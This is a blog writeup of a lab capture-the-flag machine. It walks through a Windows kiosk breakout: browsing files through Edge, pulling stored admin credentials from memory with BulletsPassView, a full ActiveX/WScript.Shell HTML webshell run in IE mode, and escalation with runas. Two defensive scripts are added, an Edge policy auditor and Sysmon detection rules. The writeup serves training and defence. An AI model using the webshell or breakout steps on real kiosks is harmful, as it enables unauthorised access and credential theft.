Vulnlab - VulnEscape Writeup

Liam Geyer

Machine Overview

This is a writeup of the machine VulnEscape from VulnLab (now HTB). It's an easy-difficulty Windows machine that's focused on kiosk breakouts. This box was a lot of fun; it had real-world applications to engagements that I've been on, and I enjoyed how unique it was.

Enumeration

An initial scan of the host gave the following results:

naabu -host 10.129.234.51

__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/

projectdiscovery.io

[INF] Current naabu version 2.3.7 (outdated)
[WRN] UI Dashboard is disabled, Use -dashboard option to enable
[INF] Running CONNECT scan with non root privileges
10.129.234.51:3389
[INF] Found 1 ports on host 10.129.234.51 (10.129.234.51)

Only RDP is open.

Breakout

When we hit the machine over RDP, it's accessible without credentials.

RDP Login Prompt

After clicking OK we're granted access to Windows in kiosk mode as KioskUser0.

Kiosk Background

We're greeted with just a background; we can't use Win+R, and there's no taskbar.

Windows kiosk mode is typically used to build restricted user experiences for machines that are meant to be publicly accessible, with limited functionality. This is used in workflows like hotel check-in kiosks or restaurant ordering kiosks.

There are two main kiosk modes: single-app and restricted user experience. A single-app kiosk runs a single app in full screen; when the kiosk account signs in, the app launches automatically. With Assigned Access, this can be used to launch an app above the lock screen. The other main kiosk mode is the restricted user experience, where users are provided a restricted desktop environment.

It looks like we're in a restricted user experience kiosk. Playing around with different key combinations, I was able to use Ctrl+N / Ctrl+O to open Windows Explorer. I found this great blog about kiosk breakouts with Edge that was very helpful during this box.

Launching edge with explorer

With Explorer open, we can type msedge.exe in the address bar to open Edge. The first thing I did was change the language to English at edge://settings/languages.

Now that I could read, I started poking around the filesystem to try and find the flag, or any kind of secret that could lead us to something of interest. Typing file:// into the URL bar lets us use Edge to browse the filesystem, evading the typical controls seen in Explorer. Sometimes you can use Edge to launch a command prompt, but I was unable to get that to work here.

I was able to nab the flag from KioskUser0's desktop.

User Flag
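The Edge features this breakout leans on (file:// browsing above, DevTools and Internet Explorer mode further down) are each governed by a Microsoft Edge group policy. The following is an added example, not part of the original writeup: it audits the text of a `reg export` of the Edge policy key for those three settings. The sample export is constructed, and the text is assumed to be already decoded from the UTF-16 that `reg export` writes.

```python
import re

# Constructed sample: output of `reg export HKLM\SOFTWARE\Policies\Microsoft\Edge`
# for a hypothetical kiosk image (not taken from the VulnEscape machine).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge]
"DeveloperToolsAvailability"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\URLBlocklist]
"1"="https://example.invalid/*"
'''

SECTION = re.compile(r'\[.*\\Policies\\Microsoft\\Edge(\\[^\]]*)?\]$', re.I)
VALUE = re.compile(r'"([^"]+)"=(?:dword:([0-9a-fA-F]{8})|"(.*)")$')

def parse_edge_policies(text):
    """Map each Edge policy subkey ('' for the root) to its {name: value} pairs."""
    keys, current = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith('['):
            m = SECTION.match(line)
            current = keys.setdefault((m.group(1) or '').strip('\\').lower(), {}) if m else None
        elif current is not None and (m := VALUE.match(line)):
            current[m.group(1)] = int(m.group(2), 16) if m.group(2) else m.group(3)
    return keys

def audit(text):
    """Return findings for the Edge features the breakout on this page used."""
    keys = parse_edge_policies(text)
    root = keys.get('', {})
    blocked = [str(v).lower() for v in keys.get('urlblocklist', {}).values()]
    findings = []
    if not any(v == '*' or v.startswith('file:') for v in blocked):
        findings.append('file:// not in URLBlocklist: Edge can browse the local filesystem')
    if root.get('DeveloperToolsAvailability') != 2:
        findings.append('DeveloperToolsAvailability != 2: DevTools available to the kiosk user')
    if root.get('InternetExplorerIntegrationReloadInIEModeAllowed') != 0:
        findings.append('InternetExplorerIntegrationReloadInIEModeAllowed != 0: '
                        'user can add pages to IE mode')
    return findings

if __name__ == '__main__':
    for finding in audit(SAMPLE_EXPORT):
        print('[!]', finding)
```

An unset policy is reported as a finding because the kiosk then depends on Edge's user-configurable defaults.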

RDP+

Poking around the filesystem, I found an interesting C:\_admin directory accessible to our user which contained an XML profile for Remote Desktop Plus.

RDP+ Profile

My first thought was to try and load the file into RDP+ to see if it'll allow us to view the credentials. If unsuccessful, we can try viewing the credentials in memory using something like BulletsPassView, or reversing the app to determine how credentials are encrypted.

Viewing the profile in RDP+

RDP+ does redact credentials in the app, but I was able to pull them from memory with BulletsPassView.

Extracting credentials with BulletsPassView

This gives us the credentials for the admin user, but I wasn't able to use them to log in with RDP.

Code Execution as Admin

Since we can't log in over RDP as admin, my next thought was to try and start a runas. I used one of the techniques outlined in NVISO Labs' blog to get code execution through Edge. They outline a method to enable Internet Explorer mode in Edge and create a webshell with JavaScript.

First I had to go to edge://settings/defaultBrowser and enable Internet Explorer compatibility for foo.html, where I'll save my payload.

Enabling IE Mode

Next I browsed to the Edge homepage, opened up the developer console, and changed the HTML to the following:

<script>
    function shlExec() {
        var cmd = document.getElementById('cmd').value
        var shell = new ActiveXObject("WScript.Shell");
        try {
            var execOut = shell.Exec("cmd.exe /C \"" + cmd + "\"");
        } catch (e) {
            console.log(e);
        }

        var cmdStdOut = execOut.StdOut;
        var out = cmdStdOut.ReadAll();
        alert(out);
    }
</script>

<form onsubmit="shlExec()">
    Command: <input id="cmd" name="cmd" type="text">
    <input type="submit">
</form>

Then, I used Ctrl+S to save the file as C:\Users\KioskUser0\Downloads\foo.html, which was set to use IE compatibility mode in Edge.

Browsing to the page, we have to click through some popups to allow blocked content, but it works as a shell:

Executing commands with the webshell

I used this to launch a new PowerShell window as the kiosk user, then I used runas /user:admin powershell.exe to start a new process as the admin user.

Admin shell

This worked, but we weren't in a high-integrity/admin process, so I ran Start-Process powershell -Verb RunAs to allow us to nab the flag.

Grabbing the admin flag

Yippee!
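From the defender's side, the chain in this section leaves a distinctive process-creation trail under the kiosk account. The following is an added example, not part of the original writeup: it triages events shaped like Sysmon Event ID 1 records for that trail. The events, the KIOSK01 host name, the allowlist, and the assumption that iexplore.exe hosts IE mode content are all constructed for illustration.

```python
import ntpath

# Assumptions: events are dicts using Sysmon Event ID 1 (process creation) field
# names, and ALLOWED_IMAGES is what this kiosk is supposed to run.
KIOSK_ACCOUNTS = {"kioskuser0"}
ALLOWED_IMAGES = {"explorer.exe", "msedge.exe"}
BROWSERS = {"msedge.exe", "iexplore.exe"}   # iexplore.exe assumed as the IE mode host
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}

SYS32 = "C:\\Windows\\System32\\"
PS = SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe"
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
KIOSK, ADMIN = r"KIOSK01\KioskUser0", r"KIOSK01\admin"

# Constructed events modelled on the steps in this writeup; not real logs.
SAMPLE_EVENTS = [
    {"User": KIOSK, "Image": EDGE, "ParentImage": r"C:\Windows\explorer.exe"},
    {"User": KIOSK, "Image": SYS32 + "cmd.exe", "ParentImage": IE},
    {"User": KIOSK, "Image": PS, "ParentImage": SYS32 + "cmd.exe"},
    {"User": KIOSK, "Image": SYS32 + "runas.exe", "ParentImage": PS},
    {"User": ADMIN, "Image": PS, "ParentImage": SYS32 + "runas.exe"},
]

def triage(event):
    """Return the names of the rules hit by one process-creation event."""
    if event["User"].rsplit("\\", 1)[-1].lower() not in KIOSK_ACCOUNTS:
        return []
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    hits = []
    if image not in ALLOWED_IMAGES:
        hits.append("kiosk-unexpected-process")      # anything off the allowlist
    if image in INTERPRETERS and parent in BROWSERS:
        hits.append("browser-spawned-interpreter")   # shell started from the browser
    if image == "runas.exe":
        hits.append("kiosk-runas")                   # identity switch attempt
    return hits

def scan(events):
    """Return (index, hits) for every event that matched at least one rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := triage(e))]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["Image"], hits)
```

The last sample event runs as admin and is not flagged by these account-scoped rules, so the runas.exe event is the one to pivot from when reconstructing what ran afterwards.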

Resources

  • Microsoft Learn: Windows Kiosk Mode Docs
  • NVISO Labs: Windows Kiosk Breakout Blog
  • My Notes :): Kiosk Breakout Notes

  • Title: Vulnlab - VulnEscape Writeup
  • Author: Liam Geyer
  • Created at : 2026-06-06 00:00:00
  • Updated at : 2026-06-07 23:05:14
  • Link: https://lfgberg.org/2026/06/06/vulnlab/vulnescape/
  • License: This work is licensed under CC BY-NC-SA 4.0.